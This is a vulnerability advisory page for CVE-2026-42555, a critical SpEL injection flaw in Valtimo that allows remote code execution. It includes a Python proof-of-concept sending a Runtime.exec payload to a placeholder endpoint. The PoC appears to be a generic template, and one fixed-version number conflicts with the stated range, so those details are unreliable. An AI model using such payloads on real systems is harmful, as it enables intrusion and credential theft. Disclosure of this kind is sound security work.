Security Vulnerability Report
中文
CVE-2026-42555 CVSS 9.1 CRITICAL

CVE-2026-42555

Published: 2026-05-14 17:16:22
Last Modified: 2026-05-14 18:13:34
Source: [email protected]

Description

Valtimo is an open-source business process automation platform. com.ritense.valtimo:document from 12.0.0 to before 12.32.0, com.ritense.valtimo:case from 13.0.0 to before 13.23.0, and com.ritense.valtimo:contract from 13.4.0 to before 13.23.0 evaluate Spring Expression Language (SpEL) expressions from user-supplied input using StandardEvaluationContext, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Execution and credential exfiltration. This vulnerability is fixed in com.ritense.valtimo:document 2.32.0, com.ritense.valtimo:case 13.23.0, and com.ritense.valtimo:contract 13.23.0.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

com.ritense.valtimo:document 12.0.0 - 12.31.x
com.ritense.valtimo:case 13.0.0 - 13.22.x
com.ritense.valtimo:contract 13.4.0 - 13.22.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-valtimo-instance/api/vulnerable_endpoint" # Malicious SpEL payload to execute 'id' command on Linux server # StandardEvaluationContext allows access to java.lang.Runtime spel_payload = "T(java.lang.Runtime).getRuntime().exec('id')" # Example payload structure based on common SpEL injection points payload_data = { "inputField": spel_payload } # Authentication is required (ADMIN role) headers = { "Authorization": "Bearer <ADMIN_ACCESS_TOKEN>", "Content-Type": "application/json" } try: # Sending the malicious request response = requests.post(target_url, json=payload_data, headers=headers) if response.status_code == 200: print("[+] Request sent successfully. Check server for command execution.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42555", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:21.907", "lastModified": "2026-05-14T18:13:33.660", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Valtimo is an open-source business process automation platform. com.ritense.valtimo:document from 12.0.0 to before 12.32.0, com.ritense.valtimo:case from 13.0.0 to before 13.23.0, and com.ritense.valtimo:contract from 13.4.0 to before 13.23.0 evaluate Spring Expression Language (SpEL) expressions from user-supplied input using StandardEvaluationContext, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Execution and credential exfiltration. This vulnerability is fixed in com.ritense.valtimo:document 2.32.0, com.ritense.valtimo:case 13.23.0, and com.ritense.valtimo:contract 13.23.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/valtimo-platform/valtimo/security/advisories/GHSA-j7j9-5253-f7vh", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.